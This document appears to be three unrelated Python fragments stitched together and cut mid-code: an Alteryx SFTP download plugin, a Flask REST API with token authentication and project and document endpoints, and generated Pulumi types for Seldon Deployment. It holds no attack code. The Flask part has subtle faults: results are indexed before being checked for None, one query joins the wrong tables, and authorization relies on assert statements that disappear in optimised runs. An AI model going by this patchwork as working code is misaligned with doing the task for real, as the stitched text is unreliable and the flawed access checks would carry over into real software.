Called when the Alteryx engine is attempting to add an incoming data connection.
:param str_type: The name of the input connection anchor, defined in the Config.xml file.
:param str_name: The name of the wire, defined by the workflow author.
:return: The IncomingInterface object(s).
"""
self.input_optional = IncomingInterface(parent=self)
return self.input_optional
def pi_add_outgoing_connection(self, str_name: str) -> bool:
"""
Called when the Alteryx engine is attempting to add an outgoing data connection.
:param str_name: The name of the output connection anchor, defined in the Config.xml file.
:return: True signifies that the connection is accepted.
"""
return True
def pi_push_all_records(self, n_record_limit: int) -> bool:
"""
Called, when no incoming connection is present, i.e. we download all files in the specific directory.
:param n_record_limit: Set it to <0 for no limit, 0 for no records, and >0 to specify the number of records.
:return: True for success, False for failure.
"""
# Don't get data when data is not actually requested
if self.alteryx_engine.get_init_var(self.n_tool_id, 'UpdateOnly') == 'True':
if self.output_recordinfo is not None:
# If we have record info from last time, just push it downstream
self.output_anchor.init(self.output_recordinfo)
return False
# Validate settings, otherwise do not do anything
if not self.validate_settings(silent=True):
return False
# Let's get going...
# Reset progress
self.output_anchor.update_progress(0)
# Prepare SFTP-connection
sftp_conn = self._init_sftp()
if not sftp_conn:
# Something went wrong
return False
# Collect all files and directories
# We need it for any tool mode, so we collect it once
file_list = list()
sftp_files = sftp_conn.listdir_attr()
for fattr in sftp_files:
file_list.append({
'filename': str(fattr.filename),
'size': int(fattr.st_size),
'uid': str(fattr.st_uid),
'gid': str(fattr.st_gid),
'mode': str(pysftp.st_mode_to_int(fattr.st_mode)),
'atime': datetime.utcfromtimestamp(int(fattr.st_atime)).strftime("%Y-%m-%d %H:%M:%S"),
'mtime': datetime.utcfromtimestamp(int(fattr.st_mtime)).strftime("%Y-%m-%d %H:%M:%S"),
'is_file': sftp_conn.isfile(fattr.filename),
'is_dir': sftp_conn.isdir(fattr.filename)
})
# Get everything Alteryx needs
self.output_recordinfo, record_creator, field_dict = self.build_ayx_output(push_metadata=True)
# Iterate through all files in current directory
item_counter = -1
for f in file_list:
# Update progress
item_counter += 1
self.output_anchor.update_progress(item_counter / float(len(file_list)))
if not f['is_file'] and self.tool_mode != self.ToolMode.LIST_FILES:
# If not a file, do not download
self.output_message('"{}{}" is not a file. Skipped.'.format(self.sftp_settings['remote_path'], f['filename']),
messageType=Sdk.EngineMessageType.warning)
continue
# Process file
self._process_file(sftp_conn, f, field_dict, self.output_recordinfo, record_creator)
# Close connection
sftp_conn.close()
# Log Tool input
if self.tool_mode == self.ToolMode.LIST_FILES:
inp_msg = "{} items in found in directory {}{}".format(len(file_list), self.sftp_settings['hostname'], self.sftp_settings['remote_path'])
else:
inp_msg = "{} files downloaded from {}{}".format(len([1 for f in file_list if f['is_file']]), self.sftp_settings['hostname'], self.sftp_settings['remote_path'])
self.output_message(inp_msg, messageType=Sdk.Status.info)
self.output_anchor.update_progress(1)
self.output_anchor.close()
return True
def pi_close(self, b_has_errors: bool):
"""
Called after all records have been processed.
:param b_has_errors: Set to true to not do the final processing.
"""
self.output_anchor.assert_close()
def output_message(self, text: str, messageType = Sdk.EngineMessageType.error):
"""
Little wrapper for Alteryx Engine expression to show a message
:param text: Error message.
:param messageType: Message type in Alteryx (default: error)
"""
self.alteryx_engine.output_message(self.n_tool_id, messageType, self.xmsg(text))
def _process_file(self, sftp_conn: pysftp.Connection, f: dict, field_dict: dict, record_info: object, record_creator: object):
"""Process single remote file.
:param sftp_conn: [description]
:type sftp_conn: pysftp.Connection
:param f: [description]
:type f: dict
:param field_dict: [description]
:type field_dict: dict
:param record_creator: [description]
:type record_creator: object
"""
# These fields are shared by all tool modes (directories only for LIST_FILES)
record_info[field_dict['Filename']].set_from_string(record_creator, f['filename'])
record_info[field_dict['Size']].set_from_int32(record_creator, f['size'])
record_info[field_dict['TimeAdded']].set_from_string(record_creator, f['atime'])
record_info[field_dict['TimeModified']].set_from_string(record_creator, f['mtime'])
if self.tool_mode == self.ToolMode.LIST_FILES:
# Fields only present for LIST_FILES mode
record_info[field_dict['UID']].set_from_string(record_creator, f['uid'])
record_info[field_dict['GID']].set_from_string(record_creator, f['gid'])
record_info[field_dict['Mode']].set_from_string(record_creator, f['mode'])
record_info[field_dict['IsDirectory']].set_from_bool(record_creator, f['is_dir'])
record_info[field_dict['IsFile']].set_from_bool(record_creator, f['is_file'])
elif self.tool_mode != self.ToolMode.LIST_FILES:
# Download files if not in LIST_FILES mode
if self.tool_mode == self.ToolMode.DOWNLOAD_TO_BLOB:
# Generate temporary filename
out_fname = self.alteryx_engine.create_temp_file_name('tmp')
elif self.tool_mode == self.ToolMode.DOWNLOAD_TO_PATH:
# Build local path for download
out_fname = os.path.join(self.output_settings['local_path'], f['filename'])
# Download file
try:
# Download file to temporary folder
sftp_conn.get(f['filename'], localpath=out_fname)
except IOError as e:
self.output_message('Error transferring file "{}": {}'.format(f['filename'], e))
# Generate BLOB for Alteryx
if self.tool_mode == self.ToolMode.DOWNLOAD_TO_BLOB:
# Read file as binary for blob
with open(out_fname, 'rb') as temp_f:
blob_content = temp_f.read()
if self.tool_mode == self.ToolMode.DOWNLOAD_TO_BLOB:
# Add file as blob
record_info[field_dict[self.output_settings['blobfield']]].set_from_blob(record_creator, blob_content)
elif self.tool_mode == self.ToolMode.DOWNLOAD_TO_PATH:
# Add file path
record_info[field_dict['FilePath']].set_from_string(record_creator, out_fname)
# Finalize record for this file and push
out_record = record_creator.finalize_record()
self.output_anchor.push_record(out_record, False)
# Reset for next file
record_creator.reset()
# Handle file after it has been downloaded
if self.file_handling == self.FileHandling.MOVE_FILES:
# Check if target folder exists
if not sftp_conn.exists(self.sftp_settings['move_path']):
self.output_message("The target folder {} does not exist.".format(self.sftp_settings['move_path']),
messageType=Sdk.EngineMessageType.warning)
return
# Check if it is actually a folder
if not sftp_conn.isdir(self.sftp_settings['move_path']):
self.output_message("The target folder {} is not a directory.".format(self.sftp_settings['move_path']),
messageType=Sdk.EngineMessageType.warning)
return
# Try to move file
try:
sftp_conn.rename(sftp_conn.pwd + "/" + f['filename'],
sftp_conn.normalize(self.sftp_settings['move_path']) + "/" + f['filename'])
except IOError as e:
self.output_message('Error moving file "{}": {}'.format(f['filename'], e))
else:
self.output_message('File {} moved to {}.'.format(f['filename'], sftp_conn.normalize(self.sftp_settings['move_path'])),
messageType=Sdk.EngineMessageType.info)
elif self.file_handling == self.FileHandling.DELETE_FILES:
# Simply delete file
try:
sftp_conn.remove(sftp_conn.pwd + "/" + f['filename'])
except IOError as e:
self.output_message('Error deleting file "{}": {}'.format(f['filename'], e))
else:
self.output_message('File {} deleted from server.'.format(f['filename']),
messageType=Sdk.EngineMessageType.info)
@staticmethod
def _prep_xmltext(et: Et, key: str) -> str:
"""Wrapper to quickly get settings.
:param et: Element Tree from parsed Xml
:type et: xml.etree.ElementTree
:param key: Name of the setting
:type key: str
:return: Parsed value for setting
:rtype: str
"""
t = et.find(key).text.strip() if et.findtext(key) and (et.find(key).text is not None) else None
return None if not t or t == "" else t
@staticmethod
def xmsg(msg_string: str) -> str:
"""
A non-interface, non-operational placeholder for the eventual localization of predefined user-facing strings.
:param msg_string: The user-facing string.
:return: msg_string
"""
return msg_string
class IncomingInterface:
"""
This optional class is returned by pi_add_incoming_connection, and it implements the incoming interface methods, to
be utilized by the Alteryx engine to communicate with a plugin when processing an incoming connection.
Prefixed with "ii", the Alteryx engine will expect the below four interface methods to be defined.
"""
def __init__(self, parent: AyxPlugin):
"""
Constructor for IncomingIntreface.
:param parent: AyxPlugin
"""
# Reference to AyxPlugin
self.ayx_plugin = parent
# RecordInfos in & out
self.record_info_in = None
self.record_info_out = None
# Input Field
self.in_field = None
# Record Creator for outputs
self.record_creator = None
self.field_dict = dict()
# SFTP Connection reference
self.sftp_conn = None
self.file_counter = 0
def ii_init(self, record_info_in: object) -> bool:
"""
Called to report changes of the incoming connection's record metadata to the Alteyx engine.
:param record_info_in: A RecordInfo object for the incoming connection's fields.
:return: True for success, otherwise False.
"""
if not self.ayx_plugin.incoming_field:
self.ayx_plugin.output_message("No incoming field selected.")
return False
self.in_field = record_info_in.get_field_by_name(self.ayx_plugin.incoming_field, throw_error=False)
if not self.in_field:
self.ayx_plugin.output_message('Field "{}" was not found in the incoming data.'.format(self.ayx_plugin.incoming_field))
return False
# Build everything for outputting data
self.record_info_out, self.record_creator, self.field_dict = self.ayx_plugin.build_ayx_output(push_metadata=True)
self.ayx_plugin.output_recordinfo = self.record_info_out
self.file_counter = 0
return True
def ii_push_record(self, in_record: object) -> bool:
"""
Called when an input record is being sent to the plugin.
:param in_record: The data for the incoming record.
:return: False if method calling limit is hit.
"""
if (in_record is None) or (self.ayx_plugin.alteryx_engine.get_init_var(self.ayx_plugin.n_tool_id, 'UpdateOnly') == 'True'):
return False
# Validate settings
if not self.ayx_plugin.validate_settings(silent=False):
return False
if not self.in_field:
return False
if self.ayx_plugin.tool_mode == self.ayx_plugin.ToolMode.LIST_FILES:
self.ayx_plugin.output_message('"List Files" is not supported when filenames are provided through an incoming connection.')
return False
# If we do not yet have a connection, we need to connect
if not self.sftp_conn:
self.sftp_conn = self.ayx_plugin._init_sftp()
if not self.sftp_conn:
return False
# Current file
cur_fname = self.in_field.get_as_string(in_record)
# Check whether file exists
if not self.sftp_conn.exists(cur_fname):
self.ayx_plugin.output_message('File "{}{}" does not exist. Skipped.'.format(self.ayx_plugin.sftp_settings['remote_path'], cur_fname),
messageType=Sdk.EngineMessageType.warning)
return True
# Check if it is actually a file
if not self.sftp_conn.isfile(cur_fname):
self.ayx_plugin.output_message('File "{}{}" is actually a folder. | |
import json
import logging
from flask import Blueprint, request, g
from flask_restful import Resource, Api
from flask_restful_swagger import swagger
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer, BadSignature, SignatureExpired
from marshmallow import EXCLUDE, ValidationError
from sqlalchemy import func, and_, or_
from sqlalchemy.exc import IntegrityError
from werkzeug.security import generate_password_hash as hash_password, check_password_hash
from lynx import utils
from lynx.model.entities import *
from lynx.model.helpers import js, eg, op
from lynx.shared import *
__all__ = [
'api_blueprint'
]
logger = logging.getLogger(__name__)
api_blueprint = Blueprint('api', __name__, template_folder='templates')
api_blueprint.version = 1
api_blueprint.url_prefix = f'/api/v{api_blueprint.version}'
api_blueprint.config = {}
def get_project(project_id, user_id=None):
if user_id is None:
user_id = g.current_user.id
result = db.session.query(Project, UserRole) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(and_(Project.id == project_id, or_(UserRole.user_id == user_id, Project.owner_id == user_id))) \
.one_or_none()
project, user_role = result[0], result[1]
if project is None:
return None
# project owner can do anything
if project.owner_id == user_id:
return project
# other wise if user_role is not defined then not authorized
assert user_role is not None and user_role.role == 'admin', {
'_root': [f'You are not authorized to view the requested project.']}
return project
def get_task(task_id, user_id=None):
if user_id is None:
user_id = g.current_user.id
result = db.session.query(Task, Project, UserRole) \
.join(Project, Project.id == Task.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(and_(Task.id == task_id, or_(UserRole.user_id == user_id, Project.owner_id == user_id))) \
.one_or_none()
task, project, user_role = result[0], result[1], result[2]
if task is None:
return None
if project.owner_id == user_id:
return task
assert user_role is not None and user_role.role == 'admin', {
'_root': [f'You are not authorized to view requested task.']}
return task
def get_document(document_id, user_id=None):
if user_id is None:
user_id = g.current_user.id
result = db.session.query(Document, Project, UserRole) \
.join(Document, Project.id == Document.project_id) \
.join(Project, Project.id == Task.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(and_(Document.id == document_id, or_(UserRole.user_id == user_id, Project.owner_id == user_id))) \
.one_or_none()
document, project, user_role = result[0], result[1], result[2]
if document is None:
return None
if project.owner_id == user_id:
return document
assert user_role is not None and user_role.role == 'admin', {
'_root': [f'You are not authorized to view requested document.']}
return document
class RestfulAPI(Api):
def handle_error(self, e):
if isinstance(e, ValidationError):
return js.fail(data=e.messages)
if isinstance(e, AssertionError) and len(e.args) > 0:
return js.fail(data=e.args[0])
if isinstance(e, TypeError):
return js.fail(data={'_root': [str(e)]})
if isinstance(e, IntegrityError):
return js.fail(data={'_root': [e.args]})
return js.error(
data={'_root': [
'Service error. Please contact your administrator to resolve the issue.'
]},
message=str(e)
)
restful = RestfulAPI(api_blueprint)
api = swagger.docs(
restful,
apiVersion=f'{api_blueprint.version}',
api_spec_url='/swagger',
description='Documents all public API endpoints.'
)
@auth.error_handler
def auth_error(status=401):
return js.error('Access Denied', {'auth': [f'Access Denied {status}']}), status
@api_blueprint.record
def record_params(setup_state):
app = setup_state.app
api.config = dict([(key, value) for (key, value) in app.config.items()])
app.config['API_VERSION'] = api_blueprint.version
app.config['API_URL_PREFIX'] = api_blueprint.url_prefix
@auth.verify_password
def verify_password(username, password):
""" Verify the provided username with password and return whether user is authorized.
:param username: username of the user.
:param password: <PASSWORD>.
:return: whether password matches the user\'s password.
"""
user = User.query.filter_by(username=username).one_or_none()
if not user or not check_password_hash(user.password, password):
return False
g.current_user = user
return True
def generate_token(user, expiration=10):
""" Generates a token for user that expires in {expiration} time.
:param user: token is created for provided user.
:param expiration: token will automatically expire in this time.
:return: generated token
"""
s = Serializer(api.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': user.id})
@auth.verify_token
def verify_token(token):
""" Verifies token, loads current user into global variable and return verification status.
:param token: token to verify.
:return: whether token is valid.
"""
s = Serializer(api.config['SECRET_KEY'])
try:
data = s.loads(token)
except SignatureExpired:
return False # valid token, but expired
except BadSignature:
return False # invalid token
user = User.query.get(data['id'])
g.current_user = user
return True
# noinspection PyMethodMayBeStatic
@swagger.model
class TokenEndpoint(Resource):
@swagger.operation(
notes='Retrieve token.',
nickname='retrieve_token',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self):
check = bool(request.args.get('check', False))
if check:
return js.success()
token = generate_token(g.current_user)
user_schema = UserSchema()
current_user = user_schema.dump(g.current_user)
return js.success({'token': token.decode('ascii'), 'user': current_user})
# noinspection PyMethodMayBeStatic
@swagger.model
class ProjectsEndpoint(Resource):
@swagger.operation(
notes='Retrieve all projects.',
nickname='retrieve_projects',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self):
offset = request.args.get('offset', None)
limit = request.args.get('limit', None)
user_id = g.current_user.id
query = Project.query \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(or_(Project.owner_id == user_id, and_(UserRole.user_id == user_id, UserRole.role == 'admin')))
paginate = utils.paginate(query, limit, offset)
data = ProjectSchema().dump(paginate.items, many=True)
return js.success({
'pagination': {
'page': paginate.page,
'pages': paginate.pages,
'has_prev': paginate.has_prev,
'has_next': paginate.has_next,
'per_page': paginate.per_page,
'total': paginate.total,
'items': data,
},
})
@swagger.operation(
notes='Creates project with provided data.',
nickname='create_projects',
parameters=[
{
"name": "project",
"description": f'Project to Import. <br> Example: {eg.project}',
"required": True,
"allowMultiple": False,
"dataType": Project.__name__,
"paramType": "body",
}
],
responseMessages=[],
)
@auth.login_required
def post(self):
data = request.get_json()
# add user details as owner
data['owner_id'] = g.current_user.id
schema = ProjectSchema()
data = schema.load(data, unknown=EXCLUDE)
project = Project(**data)
# Create project (do not commit)
op.create_object(project)
data = schema.dump(project)
return js.success(data)
# noinspection PyMethodMayBeStatic
@swagger.model
class ProjectByIDEndpoint(Resource):
@swagger.operation(
notes='Retrieve project with provided ID.',
nickname='retrieve_project',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self, project_id):
project = get_project(project_id)
data = ProjectSchema().dump(project)
return js.success(data)
@swagger.operation(
notes='Updates project with provided data.',
nickname='update_projects',
parameters=[{
"name": "project",
"description": f'Project to Update. <br> Example: {eg.project}',
"required": True,
"allowMultiple": False,
"dataType": Project.__name__,
"paramType": "body",
}],
responseMessages=[],
)
@auth.login_required
def put(self, project_id):
data = request.get_json()
schema = ProjectSchema()
schema.load(data, partial=True, unknown=EXCLUDE)
project = get_project(project_id)
op.update_object(project, data)
data = schema.dump(project)
return js.success(data)
@swagger.operation(
notes='Deletes project with provided project ID.',
nickname='delete_projects',
parameters=[],
responseMessages=[],
)
@auth.login_required
def delete(self, project_id):
project = get_project(project_id)
op.delete_object(project)
return js.success()
# noinspection PyMethodMayBeStatic
@swagger.model
class DocumentsEndpoint(Resource):
@swagger.operation(
notes='Gets documents belonging to a project.',
nickname='retrieve_documents',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self, project_id):
offset = request.args.get('offset', None)
limit = request.args.get('limit', None)
user_id = g.current_user.id
query = Document.query \
.join(Project, Project.id == Document.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(or_(and_(UserRole.user_id == user_id, UserRole.role == 'admin'),
Project.owner_id == user_id)) \
.filter(Project.id == project_id)
paginate = utils.paginate(query, limit, offset)
data = DocumentSchema().dump(paginate.items, many=True)
return js.success({
'pagination': {
'page': paginate.page,
'pages': paginate.pages,
'has_prev': paginate.has_prev,
'has_next': paginate.has_next,
'per_page': paginate.per_page,
'total': paginate.total,
'items': data,
},
})
@swagger.operation(
notes='Creates document with provided data.',
nickname='create_documents',
parameters=[
{
"name": "document",
"description": f'Document to Import. '
f'<br> Example 1: {eg.document} '
f'<br> or '
f'<br> Example 2: {eg.document_many}',
"required": True,
"allowMultiple": True,
"dataType": Document.__name__,
"paramType": "body",
}
],
responseMessages=[],
)
@auth.login_required
def post(self, project_id):
# Authorize & Validate
assert get_project(project_id) is not None, {'data': {
'_root': 'Invalid project. Please try with a valid project ID.'
}}
if 'file' in request.files:
file = request.files['file']
payload = self.process_file(file)
else:
payload = request.get_json()
if isinstance(payload, list):
for d in payload:
d.update({'project_id': project_id})
data = DocumentSchema().load(payload, many=True, unknown=EXCLUDE)
documents = [Document(**d) for d in data]
op.create_object(documents, many=True)
else:
payload.update({'project_id': project_id})
data = DocumentSchema().load(payload, unknown=EXCLUDE)
document = Document(**data)
op.create_object(document)
return js.success()
def process_file(self, file):
if file and file.filename.endswith('json'):
data = file.read().decode(api.config.get('ENCODING', 'utf-8'))
try:
documents = json.loads(data.strip())
except json.decoder.JSONDecodeError:
# Try each-line-json format
documents = []
skipped = []
for line in data.split('\n'):
try:
documents.append(json.loads(line.strip()))
except json.decoder.JSONDecodeError:
skipped += line
return documents
return []
# noinspection PyMethodMayBeStatic
@swagger.model
class DocumentByIDEndpoint(Resource):
@swagger.operation(
notes='Updates document with provided data.',
nickname='update_document',
parameters=[{
"name": "project",
"description": f'Document to Update. <br> Example: {eg.document}',
"required": True,
"allowMultiple": False,
"dataType": Document.__name__,
"paramType": "body",
}],
responseMessages=[],
)
@auth.login_required
def put(self, project_id, document_id):
# get params
data = request.get_json()
# Authenticate and get
document = get_document(document_id)
# update object
op.update_object(document, data)
# return updated
data = DocumentSchema().dump(document)
return js.success(data)
@swagger.operation(
notes='Deletes document with provided document ID.',
nickname='delete_document',
parameters=[],
responseMessages=[],
)
@auth.login_required
def delete(self, project_id, document_id):
# Authenticate and get
document = get_document(document_id)
# delete document
op.delete_object(document)
# return success
return js.success()
# noinspection PyMethodMayBeStatic
@swagger.model
class TasksEndpoint(Resource):
@swagger.operation(
notes='Gets tasks belonging to a project.',
nickname='retrieve_tasks',
parameters=[],
responseMessages=[],
)
@auth.login_required
def get(self, project_id):
# Assert project authorization for authenticated user
user_id = g.current_user.id
tasks = Task.query \
.join(Project, Project.id == Task.project_id) \
.join(UserRole, UserRole.project_id == Project.id, isouter=True) \
.filter(or_(and_(UserRole.user_id == user_id, UserRole.role == 'admin'),
Project.owner_id == user_id)) \
.filter_by(project_id=project_id) \
.all()
data = TaskSchema().dump(tasks, many=True)
return js.success(data)
@swagger.operation(
notes='Creates task with provided data.',
nickname='create_tasks',
parameters=[
{
"name": "task",
"description": f'Task to Import. <br> Example: {eg.task}',
"required": True,
"allowMultiple": False,
"dataType": Task.__name__,
"paramType": "body",
}
],
responseMessages=[],
)
@auth.login_required
def post(self, project_id):
# authenticate
project = get_project(project_id)
# Validate
assert project is not None, {'data': {
'_root': 'Invalid project. Please try with a valid project ID.'
}}
data | |
read_only: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false.
:param str sub_path: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root).
:param str sub_path_expr: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive.
"""
pulumi.set(__self__, "mount_path", mount_path)
pulumi.set(__self__, "name", name)
if mount_propagation is not None:
pulumi.set(__self__, "mount_propagation", mount_propagation)
if read_only is not None:
pulumi.set(__self__, "read_only", read_only)
if sub_path is not None:
pulumi.set(__self__, "sub_path", sub_path)
if sub_path_expr is not None:
pulumi.set(__self__, "sub_path_expr", sub_path_expr)
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> str:
"""
Path within the container at which the volume should be mounted. Must not contain ':'.
"""
return pulumi.get(self, "mount_path")
@property
@pulumi.getter
def name(self) -> str:
"""
This must match the Name of a Volume.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="mountPropagation")
def mount_propagation(self) -> Optional[str]:
"""
mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10.
"""
return pulumi.get(self, "mount_propagation")
@property
@pulumi.getter(name="readOnly")
def read_only(self) -> Optional[bool]:
"""
Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false.
"""
return pulumi.get(self, "read_only")
@property
@pulumi.getter(name="subPath")
def sub_path(self) -> Optional[str]:
"""
Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root).
"""
return pulumi.get(self, "sub_path")
@property
@pulumi.getter(name="subPathExpr")
def sub_path_expr(self) -> Optional[str]:
"""
Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive.
"""
return pulumi.get(self, "sub_path_expr")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsExplainerEndpoint(dict):
def __init__(__self__, *,
grpc_port: Optional[int] = None,
http_port: Optional[int] = None,
service_host: Optional[str] = None,
service_port: Optional[int] = None,
type: Optional[str] = None):
if grpc_port is not None:
pulumi.set(__self__, "grpc_port", grpc_port)
if http_port is not None:
pulumi.set(__self__, "http_port", http_port)
if service_host is not None:
pulumi.set(__self__, "service_host", service_host)
if service_port is not None:
pulumi.set(__self__, "service_port", service_port)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="grpcPort")
def grpc_port(self) -> Optional[int]:
return pulumi.get(self, "grpc_port")
@property
@pulumi.getter(name="httpPort")
def http_port(self) -> Optional[int]:
return pulumi.get(self, "http_port")
@property
@pulumi.getter
def service_host(self) -> Optional[str]:
return pulumi.get(self, "service_host")
@property
@pulumi.getter
def service_port(self) -> Optional[int]:
return pulumi.get(self, "service_port")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraph(dict):
def __init__(__self__, *,
name: str,
children: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildren']] = None,
endpoint: Optional['outputs.SeldonDeploymentSpecPredictorsGraphEndpoint'] = None,
env_secret_ref_name: Optional[str] = None,
implementation: Optional[str] = None,
logger: Optional['outputs.SeldonDeploymentSpecPredictorsGraphLogger'] = None,
methods: Optional[Sequence[str]] = None,
model_uri: Optional[str] = None,
parameters: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphParameters']] = None,
service_account_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param 'SeldonDeploymentSpecPredictorsGraphLoggerArgs' logger: Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
pulumi.set(__self__, "name", name)
if children is not None:
pulumi.set(__self__, "children", children)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if env_secret_ref_name is not None:
pulumi.set(__self__, "env_secret_ref_name", env_secret_ref_name)
if implementation is not None:
pulumi.set(__self__, "implementation", implementation)
if logger is not None:
pulumi.set(__self__, "logger", logger)
if methods is not None:
pulumi.set(__self__, "methods", methods)
if model_uri is not None:
pulumi.set(__self__, "model_uri", model_uri)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def children(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildren']]:
return pulumi.get(self, "children")
@property
@pulumi.getter
def endpoint(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphEndpoint']:
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="envSecretRefName")
def env_secret_ref_name(self) -> Optional[str]:
return pulumi.get(self, "env_secret_ref_name")
@property
@pulumi.getter
def implementation(self) -> Optional[str]:
return pulumi.get(self, "implementation")
@property
@pulumi.getter
def logger(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphLogger']:
"""
Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
return pulumi.get(self, "logger")
@property
@pulumi.getter
def methods(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "methods")
@property
@pulumi.getter(name="modelUri")
def model_uri(self) -> Optional[str]:
return pulumi.get(self, "model_uri")
@property
@pulumi.getter
def parameters(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphParameters']]:
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[str]:
return pulumi.get(self, "service_account_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraphChildren(dict):
def __init__(__self__, *,
children: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildren']] = None,
endpoint: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenEndpoint'] = None,
env_secret_ref_name: Optional[str] = None,
implementation: Optional[str] = None,
logger: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenLogger'] = None,
methods: Optional[Sequence[str]] = None,
model_uri: Optional[str] = None,
name: Optional[str] = None,
parameters: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenParameters']] = None,
service_account_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param 'SeldonDeploymentSpecPredictorsGraphChildrenLoggerArgs' logger: Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
if children is not None:
pulumi.set(__self__, "children", children)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if env_secret_ref_name is not None:
pulumi.set(__self__, "env_secret_ref_name", env_secret_ref_name)
if implementation is not None:
pulumi.set(__self__, "implementation", implementation)
if logger is not None:
pulumi.set(__self__, "logger", logger)
if methods is not None:
pulumi.set(__self__, "methods", methods)
if model_uri is not None:
pulumi.set(__self__, "model_uri", model_uri)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def children(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildren']]:
return pulumi.get(self, "children")
@property
@pulumi.getter
def endpoint(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenEndpoint']:
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="envSecretRefName")
def env_secret_ref_name(self) -> Optional[str]:
return pulumi.get(self, "env_secret_ref_name")
@property
@pulumi.getter
def implementation(self) -> Optional[str]:
return pulumi.get(self, "implementation")
@property
@pulumi.getter
def logger(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenLogger']:
"""
Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
return pulumi.get(self, "logger")
@property
@pulumi.getter
def methods(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "methods")
@property
@pulumi.getter(name="modelUri")
def model_uri(self) -> Optional[str]:
return pulumi.get(self, "model_uri")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenParameters']]:
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[str]:
return pulumi.get(self, "service_account_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraphChildrenChildren(dict):
def __init__(__self__, *,
children: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenChildren']] = None,
endpoint: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenEndpoint'] = None,
env_secret_ref_name: Optional[str] = None,
implementation: Optional[str] = None,
logger: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenLogger'] = None,
methods: Optional[Sequence[str]] = None,
model_uri: Optional[str] = None,
